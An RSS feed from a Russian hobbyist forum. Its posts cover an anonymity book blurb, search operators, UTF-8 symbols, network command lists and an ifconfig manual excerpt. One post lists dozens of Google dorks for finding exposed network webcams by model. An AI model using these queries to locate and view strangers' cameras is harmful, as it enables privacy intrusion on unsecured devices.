<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://antik.mybb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>АнтиК</title>
		<link>https://antik.mybb.ru/</link>
		<description>АнтиК</description>
		<language>ru-ru</language>
		<lastBuildDate>Sun, 10 Jul 2022 10:03:55 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Денис Колисниченко. Анонимность и безопасность в интернете</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=69#p69</link>
			<description>&lt;p&gt;Секреты безопасности и анонимности в интернете [2021] Колисниченко&lt;/p&gt;
						&lt;p&gt;Даже новички знают, что вычислить любого пользователя в Интернете совсем несложно. Книга рассказывает, как скрыть свое местонахождение и IP-адрес, используя анонимные сервисы и сеть Tor, посетить заблокированные администратором сайты, защитить личную переписку, домашние устройства и беспроводную сеть. Рассматриваются способы предотвратить утечку персональных данных, обеспечить безопасность мобильных устройств под управлением Android. Особое внимание уделено вопросам конфиденциальности в социальных сетях и личной переписки. В книге рассматриваются самые актуальные технологии информационной безопасности и современные версии программ.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (хуй)</author>
			<pubDate>Sun, 10 Jul 2022 10:03:55 +0300</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=69#p69</guid>
		</item>
		<item>
			<title>Продвинутый поиск в Google Yandex Bing</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=45#p45</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Язык запросов mail.ru&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Найти точную фразу поможет оператор &lt;strong&gt;двойные кавычки&lt;/strong&gt;. Если вы заключите слова запроса в кавычки, то мы будем искать документы, которые содержат именно такой порядок слов без каких-либо изменений. Например, [&amp;quot;о чем еще говорят мужчины&amp;quot;] найдет документы, которые содержат информацию именно о второй части фильма «о чем говорят мужчины», пропуская страницы с первым фильмом.&lt;/p&gt;
						&lt;p&gt;Оператор &lt;strong&gt;плюс&lt;/strong&gt; предлагает найти все результаты, в которых есть это слово, при том, что оно может быть в любой форме. Например, [сиамские кошки +подоконник], найдутся все результаты, в которых &lt;em class=&quot;bbuline&quot;&gt;обязательно&lt;/em&gt; есть слово «подоконник» в любой словоформе.&lt;/p&gt;
						&lt;p&gt;В случае, если поисковая система не может найти результаты, удовлетворяющие вашему запросу, то мы начинаем игнорировать действие операторов. Например, [&amp;quot;роза пахнет розой хоть фиалкой назови её хоть нет&amp;quot;], поскольку нет такой цитаты, то поиск предлагает посмотреть результаты, которые просто содержат такие слова.&lt;/p&gt;
						&lt;p&gt;В том случае, если вы уверены, что интересующая вас информация находится на каком-то определенном сайте, то используйте оператор «&lt;strong&gt;site:&lt;/strong&gt;». Например, на запрос [site:health.mail.ru витамины мифы] мы покажем все документы с сайта Здоровье Mail.ru, содержащие слова «витамины» и «мифы».&lt;/p&gt;</description>
			<author>mybb@mybb.ru (antik)</author>
			<pubDate>Mon, 16 Dec 2019 19:08:01 +0300</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=45#p45</guid>
		</item>
		<item>
			<title>Поиск расшаренных web-камер с помощью Google</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=42#p42</link>
			<description>&lt;p&gt;Поиск расшаренных web-камер с помощью Google&lt;/p&gt;
						&lt;p&gt;inurl:MultiCameraFrame?Mode=&lt;/p&gt;
						&lt;p&gt;inurl:&amp;quot;ViewerFrame?Mode=&amp;quot;&lt;/p&gt;
						&lt;p&gt;inurl:netw_tcp.shtml&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;supervisioncam protocol&amp;quot;&lt;/p&gt;
						&lt;p&gt;inurl:CgiStart?page=Single&lt;/p&gt;
						&lt;p&gt;inurl:indexFrame.shtml?newstyle=Quad&lt;/p&gt;
						&lt;p&gt;intitle:liveapplet inurl:LvAppl&lt;/p&gt;
						&lt;p&gt;inurl:/showcam.php?camid&lt;/p&gt;
						&lt;p&gt;inurl:video.cgi?resolution=&lt;/p&gt;
						&lt;p&gt;inurl:image?cachebust=&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;Live View / - AXIS&amp;quot;&lt;/p&gt;
						&lt;p&gt;inurl:view/view.shtml&lt;/p&gt;
						&lt;p&gt;intext:&amp;quot;MOBOTIX M1&amp;quot;&lt;/p&gt;
						&lt;p&gt;intext:&amp;quot;Open Menu&amp;quot;&lt;/p&gt;
						&lt;p&gt;intitle:snc-rz30&lt;/p&gt;
						&lt;p&gt;inurl:home/&lt;/p&gt;
						&lt;p&gt;inurl:&amp;quot;MultiCameraFrame?Mode=&amp;quot;&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;EvoCam&amp;quot; inurl:&amp;quot;webcam.html?quot;&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;Live NetSnap Cam-Server feed&amp;quot;&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;Live View / - AXIS 206M&amp;quot;&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;Live View / - AXIS 206W&amp;quot;&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;Live View / - AXIS 210&amp;quot;&lt;/p&gt;
						&lt;p&gt;inurl:indexFrame.shtml Axis&lt;/p&gt;
						&lt;p&gt;inurl:&amp;quot;ViewerFrame?Mode=&amp;quot;&lt;/p&gt;
						&lt;p&gt;inurl:&amp;quot;MultiCameraFrame?Mode=Motion&amp;quot;&lt;/p&gt;
						&lt;p&gt;intitle:start inurl:cgistart&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;WJ-NT104 Main Page&amp;quot;&lt;/p&gt;
						&lt;p&gt;intext:&amp;quot;MOBOTIX M1&amp;quot; intext:&amp;quot;Open Menu&amp;quot;&lt;/p&gt;
						&lt;p&gt;intext:&amp;quot;MOBOTIX M10&amp;quot; intext:&amp;quot;Open Menu&amp;quot;&lt;/p&gt;
						&lt;p&gt;intext:&amp;quot;MOBOTIX D10&amp;quot; intext:&amp;quot;Open Menu&amp;quot;&lt;/p&gt;
						&lt;p&gt;intitle:snc-z20 inurl:home/&lt;/p&gt;
						&lt;p&gt;intitle:snc-cs3 inurl:home/&lt;/p&gt;
						&lt;p&gt;intitle:snc-rz30 inurl:home/&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;sony network camera snc-p1&amp;quot;&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;sony network camera snc-m1&amp;quot;&lt;/p&gt;
						&lt;p&gt;site:.viewnetcam.com -w w w.viewnetcam.com&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;Toshiba Network Camera&amp;quot; user login&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;netcam live image&amp;quot;&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;i-Catcher Console - Web Monitor&amp;quot;&lt;/p&gt;
						&lt;p&gt;inurl:/home/home&lt;/p&gt;
						&lt;p&gt;intitle:flexwatch intext:&amp;quot;Copyright by Seyeon TECH Co&amp;quot;&lt;/p&gt;
						&lt;p&gt;intitle:&amp;quot;snc-rz30 home&amp;quot;&lt;/p&gt;
						&lt;p&gt;intitle: Network camera&lt;/p&gt;</description>
			<author>mybb@mybb.ru (H4ck3r)</author>
			<pubDate>Sun, 27 Sep 2015 11:13:57 +0300</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=42#p42</guid>
		</item>
		<item>
			<title>Популярные графические символы UTF-8 для сайтов</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=41#p41</link>
			<description>&lt;p&gt;Популярные графические символы UTF-8 для сайтов&lt;/p&gt;
						&lt;p&gt;В данной статье собраны самые популярные и востребованные графические символы из таблиц UTF-8. Всех их можно добавить на свой сайт и, таким образом, разнообразить предоставляемую информацию, путем &amp;quot;вкрапления&amp;quot; картинок в стройные &amp;#9773; ряды букв. Помимо этого Вы можете использовать данные знаки на своей странице ВКонтакте, либо при комментировании сторонних блогов.&lt;/p&gt;
						&lt;p&gt;Некоторые вебмастера добавляют подобные символы в Description страницы, что позволяет украсить сниппет и привлечь дополнительных пользователей на сайт не за счет высокой позиции в поисковой выдаче, а за счет выделения на фоне конкурентов.&lt;/p&gt;
						&lt;p&gt;Обращаю Ваше внимание&lt;br /&gt;в некоторых браузерах часть представленных знаков могут не отображаться, а вместо них будет выводиться квадрат, либо непонятные прямоугольник с набором букв внутри. Это связано с разными технологиями, которые используют разработчики браузеров (Mozilla FireFox, Chrome, Opera и IE), а так же версией Windows.&lt;/p&gt;
						&lt;p&gt;О том, как украсить снипет в поисковой выдаче, читайте на блогах, посвященных SEO (проблем не возникнет при поиске, ибо почти на каждом таком сайте есть статья на тему). Я же Вам предлагаю сборку самых красивых и оригинальных графических картинок, которые Вы сможете использовать простым копированием из данной статьи через буфер обмена и вставкой в нужное место. Поэтому добавляйте эту страницу в закладки (CTRL+D) и возвращайтесь, когда будете писать новую статью.&lt;/p&gt;
						&lt;p&gt;Прочитать о UTF-8 Вы можете на Википедии.&lt;/p&gt;
						&lt;p&gt;Если знаки кажутся Вам маленькими, то достаточно их увеличить точно так же, как Вы увеличиваете шрифт на своем сайте. Аналогично и с цветом - выделяете и меняете в панели редактирования статьи.&lt;br /&gt;Символы алфавита&lt;/p&gt;
						&lt;p&gt;&amp;#9398; &amp;#9399; &amp;#9400; &amp;#9401; &amp;#9402; &amp;#9403; &amp;#9404; &amp;#9405; &amp;#9406; &amp;#9407; &amp;#9408; &amp;#9409; &amp;#9410; &amp;#9411; &amp;#9412; &amp;#9413; &amp;#9414; &amp;#9415; &amp;#9416; &amp;#9417; &amp;#9418; &amp;#9419; &amp;#9420; &amp;#9421; &amp;#9422; &amp;#9423; &amp;#9424; &amp;#9425; &amp;#9426; &amp;#9427; &amp;#9428; &amp;#9429; &amp;#9430; &amp;#9431; &amp;#9432; &amp;#9433; &amp;#9434; &amp;#9435; &amp;#9436; &amp;#9437; &amp;#9438; &amp;#9439; &amp;#9440; &amp;#9441; &amp;#9442; &amp;#9443; &amp;#9444; &amp;#9445; &amp;#9446; &amp;#9447; &amp;#9448; &amp;#9449;&lt;/p&gt;
						&lt;p&gt;&amp;#9372; &amp;#9373; &amp;#9374; &amp;#9375; &amp;#9376; &amp;#9377; &amp;#9378; &amp;#9379; &amp;#9380; &amp;#9381; &amp;#9382; &amp;#9383; &amp;#9384; &amp;#9385; &amp;#9386; &amp;#9387; &amp;#9388; &amp;#9389; &amp;#9390; &amp;#9391; &amp;#9392; &amp;#9393; &amp;#9394; &amp;#9395; &amp;#9396; &amp;#9397;&lt;/p&gt;
						&lt;p&gt;Чаще всего данные графические рисунки используют на страницах ВКонтакте, когда выкладывают из них свое имя или фамилию. Хотя, нередки случаи использования алфавита на коммерческих проектах, в целях акцентирования внимания к определенной части текста (к примеру: АКЦИЯ! Весь декабрь скидка 0%).&lt;br /&gt;Цифровое обозначение&lt;/p&gt;
						&lt;p&gt;&amp;#9332; &amp;#9333; &amp;#9334; &amp;#9335; &amp;#9336; &amp;#9337; &amp;#9338; &amp;#9339; &amp;#9340; &amp;#9341; &amp;#9342; &amp;#9343; &amp;#9344; &amp;#9345; &amp;#9346; &amp;#9347; &amp;#9348; &amp;#9349; &amp;#9350; &amp;#9351;&lt;/p&gt;
						&lt;p&gt;&amp;#10102; &amp;#10103; &amp;#10104; &amp;#10105; &amp;#10106; &amp;#10107; &amp;#10108; &amp;#10109; &amp;#10110; &amp;#10111;&lt;/p&gt;
						&lt;p&gt;&amp;#8544; &amp;#8545; &amp;#8546; &amp;#8547; &amp;#8548; &amp;#8549; &amp;#8550; &amp;#8551; &amp;#8552; &amp;#8553; &amp;#8554; &amp;#8555;&lt;/p&gt;
						&lt;p&gt;&amp;#9352; &amp;#9353; &amp;#9354; &amp;#9355; &amp;#9356; &amp;#9357; &amp;#9358; &amp;#9359; &amp;#9360; &amp;#9361; &amp;#9362; &amp;#9363; &amp;#9364; &amp;#9365; &amp;#9366; &amp;#9367; &amp;#9368; &amp;#9369; &amp;#9370; &amp;#9371;&lt;/p&gt;
						&lt;p&gt;&amp;#10112; &amp;#10113; &amp;#10114; &amp;#10115; &amp;#10116; &amp;#10117; &amp;#10118; &amp;#10119; &amp;#10120; &amp;#10122; &amp;#10123; &amp;#10124; &amp;#10125; &amp;#10126; &amp;#10127; &amp;#10128; &amp;#10129; &amp;#10130; &amp;#10131;&lt;/p&gt;
						&lt;p&gt;&amp;#9843; &amp;#9844; &amp;#9845; &amp;#9846; &amp;#9847; &amp;#9848; &amp;#9849;&lt;/p&gt;
						&lt;p&gt;С цифрами все просто: указали адрес, телефон или уровень заработной платы. Можете проверить на знакомых, куда они обратят вначале внимание, при заходе на страницу с графическими символами цифр. Поэтому берем на вооружение и повышаем продажи через свои интернет-магазины или корпоративные сайты, где много однообразного текста.&lt;br /&gt;Символы-указатели (стрелки)&lt;/p&gt;
						&lt;p&gt;&amp;#8592; &amp;#8593; &amp;#8594; &amp;#8595; &amp;#8596; &amp;#8597; &amp;#8598; &amp;#8599; &amp;#8600; &amp;#8601; &amp;#8602; &amp;#8603; &amp;#8604; &amp;#8605; &amp;#8606; &amp;#8607; &amp;#8608; &amp;#8609; &amp;#8610; &amp;#8611; &amp;#8612; &amp;#8613; &amp;#8614; &amp;#8615; &amp;#8616; &amp;#8617; &amp;#8618; &amp;#8619; &amp;#8620; &amp;#8621; &amp;#8622; &amp;#8623; &amp;#8624; &amp;#8625; &amp;#8626; &amp;#8627; &amp;#8628; &amp;#8629; &amp;#8630; &amp;#8631; &amp;#8632; &amp;#8633; &amp;#8634; &amp;#8635; &amp;#8636; &amp;#8637; &amp;#8638; &amp;#8639; &amp;#8640; &amp;#8641; &amp;#8642; &amp;#8643; &amp;#8644; &amp;#8645; &amp;#8646; &amp;#8647; &amp;#8648; &amp;#8649; &amp;#8650; &amp;#8651; &amp;#8652; &amp;#8653; &amp;#8654; &amp;#8655; &amp;#8656; &amp;#8657; &amp;#8658; &amp;#8659; &amp;#8660; &amp;#8661; &amp;#8662; &amp;#8663; &amp;#8664; &amp;#8665; &amp;#8666; &amp;#8667; &amp;#8668; &amp;#8669; &amp;#8670; &amp;#8671; &amp;#8672; &amp;#8673; &amp;#8674; &amp;#8675; &amp;#8676; &amp;#8677; &amp;#8678; &amp;#8679; &amp;#8680; &amp;#8681; &amp;#8682; &amp;#8683; &amp;#8684; &amp;#8685; &amp;#8686; &amp;#8687; &amp;#8688; &amp;#8689; &amp;#8690; &amp;#8691; &amp;#8692; &amp;#8693; &amp;#8694; &amp;#8695; &amp;#8696; &amp;#8697; &amp;#8698; &amp;#8699; &amp;#8700; &amp;#8701; &amp;#8702; &amp;#8703; &amp;#9166; &amp;#10229; &amp;#10230; &amp;#10231; &amp;#10232; &amp;#10233; &amp;#10234; &amp;#10235; &amp;#10236; &amp;#10237; &amp;#10238; &amp;#10239; &amp;#10496; &amp;#10497; &amp;#10498; &amp;#10499; &amp;#10500; &amp;#10501; &amp;#10502; &amp;#10503; &amp;#10504; &amp;#10505; &amp;#10506; &amp;#10507; &amp;#10508; &amp;#10509; &amp;#10510; &amp;#10511; &amp;#10512; &amp;#10513; &amp;#10514; &amp;#10515; &amp;#10516; &amp;#10517; &amp;#10518; &amp;#10519; &amp;#10520; &amp;#10521; &amp;#10522; &amp;#10523; &amp;#10524; &amp;#10525; &amp;#10526; &amp;#10527; &amp;#10528; &amp;#10529; &amp;#10586; &amp;#10587; &amp;#10588; &amp;#10589; &amp;#10590; &amp;#10591; &amp;#10592; &amp;#10593; &amp;#10594; &amp;#10595; &amp;#10596; &amp;#10597; &amp;#10598; &amp;#10599; &amp;#10600; &amp;#10601; &amp;#10602; &amp;#10603; &amp;#10604; &amp;#10605; &amp;#10606; &amp;#10607; &amp;#10608; &amp;#10609; &amp;#10610; &amp;#10611; &amp;#10612; &amp;#10613; &amp;#10614; &amp;#10615; &amp;#10616; &amp;#10617; &amp;#10618; &amp;#10619; &amp;#10620; &amp;#10621; &amp;#10622; &amp;#10623; &amp;#10161; &amp;#10162; &amp;#10163; &amp;#10164; &amp;#10165; &amp;#10166; &amp;#10167; &amp;#10168; &amp;#10136; &amp;#10137; &amp;#10138; &amp;#10139; &amp;#10140; &amp;#10141; &amp;#10142; &amp;#10143; &amp;#10144; &amp;#10145; &amp;#10146; &amp;#10147; &amp;#10148; &amp;#10149; &amp;#10150; &amp;#10151; &amp;#10152; &amp;#10153; &amp;#10154; &amp;#10155; &amp;#10156; &amp;#10157; &amp;#10158; &amp;#10159; &amp;#10132; &amp;#10169; &amp;#10170; &amp;#10171; &amp;#10172; &amp;#10173; &amp;#10174; &amp;#11012; &amp;#11013; &amp;#11014; &amp;#11015;&lt;/p&gt;
						&lt;p&gt;При помощи стрелок и указателей можно направить скользящий взгляд посетителя сайта в нужном направлении. Причем Вам не потребуется вставлять картинку, что скажется на скорости загрузки страницы со всеми вытекающими последствиями. Выбираем цвет и размер, как было сказано вначале статьи.&lt;br /&gt;Фигуры&lt;/p&gt;
						&lt;p&gt;&amp;#9600; &amp;#9601; &amp;#9602; &amp;#9603; &amp;#9604; &amp;#9605; &amp;#9606; &amp;#9607; &amp;#9608; &amp;#9609; &amp;#9610; &amp;#9611; &amp;#9612; &amp;#9613; &amp;#9614; &amp;#9615; &amp;#9616; &amp;#9617; &amp;#9618; &amp;#9619; &amp;#9620; &amp;#9621; &amp;#9632; &amp;#9633; &amp;#9634; &amp;#9635; &amp;#9636; &amp;#9637; &amp;#9638; &amp;#9639; &amp;#9640; &amp;#9641; &amp;#9642; &amp;#9643; &amp;#9644; &amp;#9645; &amp;#9646; &amp;#9647; &amp;#9648; &amp;#9649; &amp;#9650; &amp;#9651; &amp;#9652; &amp;#9653; &amp;#9654; &amp;#9655; &amp;#9656; &amp;#9657; &amp;#9658; &amp;#9659; &amp;#9660; &amp;#9661; &amp;#9662; &amp;#9663; &amp;#9664; &amp;#9665; &amp;#9666; &amp;#9667; &amp;#9668; &amp;#9669; &amp;#9670; &amp;#9671; &amp;#9672; &amp;#9673; &amp;#9674; &amp;#9675; &amp;#9676; &amp;#9677; &amp;#9678; &amp;#9679; &amp;#9680; &amp;#9681; &amp;#9682; &amp;#9683; &amp;#9684; &amp;#9685; &amp;#9686; &amp;#9687; &amp;#9688; &amp;#9689; &amp;#9690; &amp;#9691; &amp;#9692; &amp;#9693; &amp;#9694; &amp;#9695; &amp;#9696; &amp;#9697; &amp;#9698; &amp;#9699; &amp;#9700; &amp;#9701; &amp;#9702; &amp;#9703; &amp;#9704; &amp;#9705; &amp;#9706; &amp;#9707; &amp;#9708; &amp;#9709; &amp;#9710;&lt;/p&gt;
						&lt;p&gt;Комбинируя представленные выше символы из таблицы UTF-8, Вы сможете придумать действительно уникальное оформление, которое будет отличаться своей неординарностью. Главное не переборщить.&lt;br /&gt;Забавные символы&lt;/p&gt;
						&lt;p&gt;&amp;#9711; &amp;#9728; &amp;#9729; &amp;#9730; &amp;#9731; &amp;#9732; &amp;#9733; &amp;#9734; &amp;#9735; &amp;#9736; &amp;#9737; &amp;#9738; &amp;#9739; &amp;#9740; &amp;#9741; &amp;#9742; &amp;#9743; &amp;#9744; &amp;#9745; &amp;#9746; &amp;#9747; &amp;#9750; &amp;#9751; &amp;#9754; &amp;#9755; &amp;#9756; &amp;#9757; &amp;#9758; &amp;#9759; &amp;#9760; &amp;#9761; &amp;#9762; &amp;#9763; &amp;#9764; &amp;#9765; &amp;#9766; &amp;#9767; &amp;#9768; &amp;#9769; &amp;#9770; &amp;#9771; &amp;#9772; &amp;#9773; &amp;#9774; &amp;#9775; &amp;#9850; &amp;#9851; &amp;#9852; &amp;#9853; &amp;#9985; &amp;#9986; &amp;#9987; &amp;#9988; &amp;#9990; &amp;#9991; &amp;#9992; &amp;#9993; &amp;#9996; &amp;#9997; &amp;#9998; &amp;#9999; &amp;#10000; &amp;#10001; &amp;#10002; &amp;#10003; &amp;#10004; &amp;#10005; &amp;#10006; &amp;#10007; &amp;#10008; &amp;#10009; &amp;#10010; &amp;#10011; &amp;#10012; &amp;#10013; &amp;#10014; &amp;#10015; &amp;#10016; &amp;#10017; &amp;#10018; &amp;#10019; &amp;#10020; &amp;#10021; &amp;#10022; &amp;#10023; &amp;#10025; &amp;#10026; &amp;#10027; &amp;#10028; &amp;#10029; &amp;#10030; &amp;#10031; &amp;#10032; &amp;#10033; &amp;#10034; &amp;#10035; &amp;#10036; &amp;#10037; &amp;#10038; &amp;#10039; &amp;#10040; &amp;#10041; &amp;#10042; &amp;#10043; &amp;#10044; &amp;#10045; &amp;#10046; &amp;#10047; &amp;#10048; &amp;#10049; &amp;#10050; &amp;#10051; &amp;#10052; &amp;#10053; &amp;#10054; &amp;#10055; &amp;#10056; &amp;#10057; &amp;#10058; &amp;#10059; &amp;#10061; &amp;#10063; &amp;#10064; &amp;#10065; &amp;#10066; &amp;#10070; &amp;#10081; &amp;#10082; &amp;#10083; &amp;#10084; &amp;#10085; &amp;#10086; &amp;#10087; &amp;#3424; &amp;#3425; &amp;#3757; &amp;#3758; &amp;#3759; &amp;#12292; &amp;#8414; &amp;#8415; &amp;#10752; &amp;#10753; &amp;#10754; &amp;#10075; &amp;#10076; &amp;#10077; &amp;#10078; † ‡ &amp;#8882; &amp;#8883; &amp;#8884; &amp;#8885; &amp;#9888; &amp;#9838; &amp;#9839; &amp;#9840; &amp;#9841; &amp;#9842; &amp;#1641;(&amp;#865;&amp;#3663;&amp;#815;&amp;#865;&amp;#3663;)&amp;#1782; &amp;#440;&amp;#820;&amp;#1217;&amp;#820;&amp;#439; &amp;#1769; &amp;#1758; ©&lt;/p&gt;
						&lt;p&gt;Действительно &amp;quot;забавные&amp;quot; картинки. Знак телефона удобно поставить возле номера, самолет отлично подойдет для текстов &amp;quot;авиационной&amp;quot; тематики. &amp;quot;Погодные&amp;quot; и религиозные картинки, звезды и прочие, разнообразят абсолютно любой текст. Лично я всегда использую &amp;#9742;.&lt;br /&gt;Математические, физические и прочие науки&lt;/p&gt;
						&lt;p&gt;&amp;#8448; &amp;#8449; &amp;#8450; &amp;#8451; &amp;#8452; &amp;#8453; &amp;#8454; &amp;#8455; &amp;#8456; &amp;#8457; &amp;#8458; &amp;#8459; &amp;#8460; &amp;#8461; &amp;#8462; &amp;#8463; &amp;#8464; &amp;#8465; &amp;#8466; &amp;#8467; &amp;#8468; &amp;#8469; № &amp;#8471; &amp;#8472; &amp;#8473; &amp;#8474; &amp;#8475; &amp;#8476; &amp;#8477; &amp;#8478; &amp;#8479; &amp;#8483; &amp;#8484; &amp;#8485; &amp;#937; &amp;#8487; &amp;#8488; &amp;#8489; K &amp;#197; &amp;#8492; &amp;#8493; &amp;#8494; &amp;#8495; &amp;#8496; &amp;#8497; &amp;#8498; &amp;#8499; &amp;#8500; &amp;#8531; &amp;#8532; &amp;#8533; &amp;#8534; &amp;#8535; &amp;#8536; &amp;#8537; &amp;#8538; &amp;#8539; &amp;#8540; &amp;#8541; &amp;#8542; &amp;#8760; &amp;#8761; &amp;#8762; &amp;#8763; &amp;#8764; &amp;#8765; &amp;#8766; &amp;#8767; &amp;#8768; &amp;#8769; &amp;#8770; &amp;#8771; &amp;#8772; &amp;#8773; &amp;#8774; &amp;#8775; &amp;#8776; &amp;#8777; &amp;#8778; &amp;#8779; &amp;#8780; &amp;#8781; &amp;#8782; &amp;#8783; &amp;#8784; &amp;#8785; &amp;#8786; &amp;#8787; &amp;#8788; &amp;#8789; &amp;#8790; &amp;#8791; &amp;#8792; &amp;#8793; &amp;#8794; &amp;#8795; &amp;#8796; &amp;#8797; &amp;#8798; &amp;#8799; &amp;#8800; &amp;#8801; &amp;#8802; &amp;#8803; &amp;#8804; &amp;#8805; &amp;#8806; &amp;#8807; &amp;#8808; &amp;#8809; &amp;#8810; &amp;#8811; &amp;#8812; &amp;#8813; &amp;#8814; &amp;#8815; &amp;#8816; &amp;#8817; &amp;#8818; &amp;#8819; &amp;#8820; &amp;#8821; &amp;#8822; &amp;#8823; &amp;#8824; &amp;#8825; &amp;#8826; &amp;#8827; &amp;#8828; &amp;#8829; &amp;#8830; &amp;#8831; &amp;#8832; &amp;#8833; &amp;#8834; &amp;#8835; &amp;#8836; &amp;#8837; &amp;#8838; &amp;#8839; &amp;#8840; &amp;#8841; &amp;#8842; &amp;#8843; &amp;#8704; &amp;#8705; &amp;#8706; &amp;#8707; &amp;#8708; &amp;#8709; &amp;#8710; &amp;#8711; &amp;#8712; &amp;#8713; &amp;#8714; &amp;#8715; &amp;#8716; &amp;#8717; &amp;#8718; &amp;#8719; &amp;#8720; &amp;#8721; &amp;#8722; &amp;#8723; &amp;#8724; &amp;#8725; &amp;#8726; &amp;#8727; &amp;#8728; &amp;#8729; &amp;#8730; &amp;#8731; &amp;#8732; &amp;#8733; &amp;#8734; &amp;#8735; &amp;#8736; &amp;#8737; &amp;#8738; &amp;#8739; &amp;#8740; &amp;#8741; &amp;#8742; &amp;#8743; &amp;#8744; &amp;#8745; &amp;#8746; &amp;#8747; &amp;#8748; &amp;#8749; &amp;#8750; &amp;#8751; &amp;#8752; &amp;#8753; &amp;#8754; &amp;#8755; &amp;#9138; &amp;#9139; &amp;#9143; &amp;#8983; &amp;#8984; &amp;#8509; &amp;#8510; &amp;#8511; &amp;#8512;&lt;/p&gt;
						&lt;p&gt;Думаю, что данные символы найдут свое назначение, если у Вас текст научной направленности, либо Вы любите &amp;quot;ввернуть&amp;quot; какое-нибудь умное словечко, подкрепив его картинкой.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (utf-8)</author>
			<pubDate>Fri, 21 Aug 2015 10:32:31 +0300</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=41#p41</guid>
		</item>
		<item>
			<title>Команды по управлению и диагностике сети</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=40#p40</link>
			<description>&lt;p&gt;Команды по управлению и диагностике сети в Windows.&lt;/p&gt;
						&lt;p&gt;arp&lt;br /&gt;ipconfig&lt;br /&gt;getmac&lt;br /&gt;nbtstat&lt;br /&gt;netsh&lt;br /&gt;netstat&lt;br /&gt;net&lt;br /&gt;nslookup&lt;br /&gt;pathping&lt;br /&gt;ping&lt;br /&gt;route&lt;br /&gt;telnet&lt;br /&gt;tracert&lt;/p&gt;
						&lt;p&gt;Примеры практического использования.&lt;/p&gt;
						&lt;p&gt;Команды по управлению и диагностике сети в UNIX.&lt;/p&gt;
						&lt;p&gt;arp&lt;br /&gt;host&lt;br /&gt;ifconfig&lt;br /&gt;ip&lt;br /&gt;iptables&lt;br /&gt;netstat&lt;br /&gt;nmap&lt;br /&gt;ping&lt;br /&gt;route&lt;br /&gt;ssh&lt;br /&gt;tcpdump&lt;br /&gt;telnet&lt;br /&gt;traceroute&lt;/p&gt;</description>
			<author>mybb@mybb.ru (bash)</author>
			<pubDate>Tue, 10 Mar 2015 14:18:57 +0300</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=40#p40</guid>
		</item>
		<item>
			<title>Команды по управлению и диагностике сети в UNIX</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=39#p39</link>
			<description>&lt;p&gt;Методические указания по командам управления сетью в UNIX&lt;/p&gt;
						&lt;p&gt;Команды по конфигурированию сети&lt;/p&gt;
						&lt;p&gt;ifconfig&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда используется для настройки сетевых интерфейсов&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда ifconfig имеет следующий синтаксис:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; ifconfig [-L] [-m] interface [create] [address_family] [address [dest_address]] [parameters]&lt;br /&gt;&amp;#160; &amp;#160; ifconfig interface destroy&lt;br /&gt;&amp;#160; &amp;#160; ifconfig -a [-L] [-d] [-m] [-u] [address_family]&lt;br /&gt;&amp;#160; &amp;#160; ifconfig -l [-d] [-u] [address_family]&lt;br /&gt;&amp;#160; &amp;#160; ifconfig [-L] [-d] [-m] [-u] [-C]&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда ifconfig используется для настройки сетевых интерфейсов. Команда должна использоваться при загрузке системы для настройки адресов каждого сетевого интерфейса, а также может использоваться после загрузки для изменения параметров сетевых интерфейсов. Если команда введена без аргументов, ifconfig выдает информацию о состоянии активных интерфейсов. Если в качестве аргумента указан какой-либо интерфейс, то выдается информация только о состоянии этого интерфейса; если указан один аргумент -a, выдается информация о состоянии всех интерфесов, даже отключенных. Пример:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; user@desktop$ ifconfig rl0&lt;br /&gt;&amp;#160; &amp;#160; rl0: flags=8843&amp;lt;UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST&amp;gt; mtu 1500&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;options=8&amp;lt;VLAN_MTU&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;inet6 fe80::250:22ff:febb:5f1%rl0 prefixlen 64 scopeid 0x3&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;inet 192.168.19.86 netmask 0xffffff00 broadcast 192.168.19.255&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;ether 00:50:22:bb:05:f1&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;media: Ethernet autoselect (100baseTX &amp;lt;full-duplex&amp;gt;)&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;status: active&lt;/p&gt;
